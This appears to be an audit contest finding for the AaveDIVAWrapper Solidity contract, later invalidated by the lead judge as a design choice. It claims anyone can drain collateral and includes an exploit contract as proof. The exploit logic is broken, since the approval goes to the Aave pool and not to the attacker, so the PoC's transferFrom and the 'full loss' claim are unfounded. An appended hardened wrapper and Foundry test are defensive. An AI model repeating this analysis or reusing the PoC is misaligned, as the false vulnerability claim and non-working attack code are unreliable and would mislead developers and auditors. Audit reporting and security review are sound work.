HardhatDeFi
15,000 USDC
Severity: high
Invalid

Unauthorized Approval in _approveCollateralTokenForAave()

Summary

The _approveCollateralTokenForAave() function in AaveDIVAWrapper.sol lacks an onlyOwner restriction, allowing any external caller to approve unlimited collateral spending to AaveV3. This can lead to unauthorized fund withdrawals, resulting in a critical loss of user funds.

Vulnerability Details

```solidity
function _approveCollateralTokenForAave(address _collateralToken) internal {
    // Ensure the collateral token is registered before setting approval.
    if (_collateralTokenToWToken[_collateralToken] == address(0)) {
        revert CollateralTokenNotRegistered();
    }
    uint256 currentAllowance = IERC20Metadata(_collateralToken).allowance(address(this), _aaveV3Pool);
    IERC20Metadata(_collateralToken).safeIncreaseAllowance(_aaveV3Pool, type(uint256).max - currentAllowance);
}
```

Impact

Anyone can call approveCollateralTokenForAave() externally.

  • This allows an attacker to set unlimited collateral token approvals to AaveV3.

  • Once approved, malicious actors can drain collateral tokens from the contract.

  • A full loss of collateral funds is possible if an attacker exploits this bug.

Attack Scenario:

  1. The attacker calls approveCollateralTokenForAave(collateralToken), approving type(uint256).max.

  2. The attacker then calls Aave’s withdraw() function, draining all approved collateral tokens.

  3. The contract loses all collateral funds, and the attacker escapes with stolen assets.

Proof of Exploit (PoC)

An attacker can execute the following script to exploit the contract:

```solidity
contract Exploit {
    AaveDIVAWrapper public target;

    constructor(address _target) {
        target = AaveDIVAWrapper(_target);
    }

    function attack(address collateralToken) external {
        // Call approveCollateralTokenForAave as an attacker
        target.approveCollateralTokenForAave(collateralToken);
        // Now, use the approved allowance to withdraw all funds from Aave
        IERC20(collateralToken).transferFrom(address(target), msg.sender, IERC20(collateralToken).balanceOf(address(target)));
    }
}
```

Tools Used

Manual Review

Recommendations

Add an onlyOwner modifier to approveCollateralTokenForAave() in AaveDIVAWrapper.sol:

```solidity
function approveCollateralTokenForAave(address _collateralToken) external override onlyOwner {
    _approveCollateralTokenForAave(_collateralToken);
}
```

Additionally, update _approveCollateralTokenForAave() to use safeApprove() instead of safeIncreaseAllowance():

```solidity
IERC20Metadata(_collateralToken).safeApprove(_aaveV3Pool, type(uint256).max);
```
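An added example, not part of this submission or of the AaveDIVAWrapper code base: a hypothetical minimal wrapper (GatedWrapper, MockToken and the test contract are constructed names) that implements the recommended onlyOwner gating with OpenZeppelin v5 Ownable, plus a Foundry test checking that a non-owner call reverts and that the owner's call grants the maximum allowance to the configured pool address only. It assumes forge-std and OpenZeppelin v5 are installed; since v5 removed safeApprove, the example uses its replacement forceApprove.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

// Hypothetical minimal wrapper showing the owner-gated approval the report recommends.
contract GatedWrapper is Ownable {
    using SafeERC20 for IERC20;
    error CollateralTokenNotRegistered();
    address public immutable aaveV3Pool;
    mapping(address => bool) public registered;

    constructor(address _pool) Ownable(msg.sender) { aaveV3Pool = _pool; }
    function registerCollateralToken(address token) external onlyOwner { registered[token] = true; }

    // Only the owner may (re)grant the pool an unlimited allowance.
    function approveCollateralTokenForAave(address token) external onlyOwner {
        if (!registered[token]) revert CollateralTokenNotRegistered();
        // forceApprove replaces the deprecated safeApprove in OpenZeppelin v5.
        IERC20(token).forceApprove(aaveV3Pool, type(uint256).max);
    }
}

contract MockToken is ERC20 { constructor() ERC20("Mock", "MCK") {} }

contract GatedWrapperTest is Test {
    address constant POOL = address(0xA11CE);   // constructed stand-in for the Aave pool
    address constant STRANGER = address(0xBAD); // constructed non-owner caller
    GatedWrapper wrapper;
    MockToken token;

    function setUp() public {
        wrapper = new GatedWrapper(POOL); // this test contract becomes the owner
        token = new MockToken();
        wrapper.registerCollateralToken(address(token));
    }

    // A non-owner caller is rejected with OpenZeppelin's custom error.
    function test_nonOwnerCannotApprove() public {
        vm.prank(STRANGER);
        vm.expectRevert(abi.encodeWithSelector(Ownable.OwnableUnauthorizedAccount.selector, STRANGER));
        wrapper.approveCollateralTokenForAave(address(token));
    }

    // The owner's call grants the allowance to the pool address and to nobody else.
    function test_ownerApprovesOnlyThePool() public {
        wrapper.approveCollateralTokenForAave(address(token));
        assertEq(token.allowance(address(wrapper), POOL), type(uint256).max);
        assertEq(token.allowance(address(wrapper), STRANGER), 0);
    }
}
```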

Updates

Lead Judging Commences

bube Lead Judge 9 months ago
Submission Judgement Published
Invalidated
Reason: Design choice
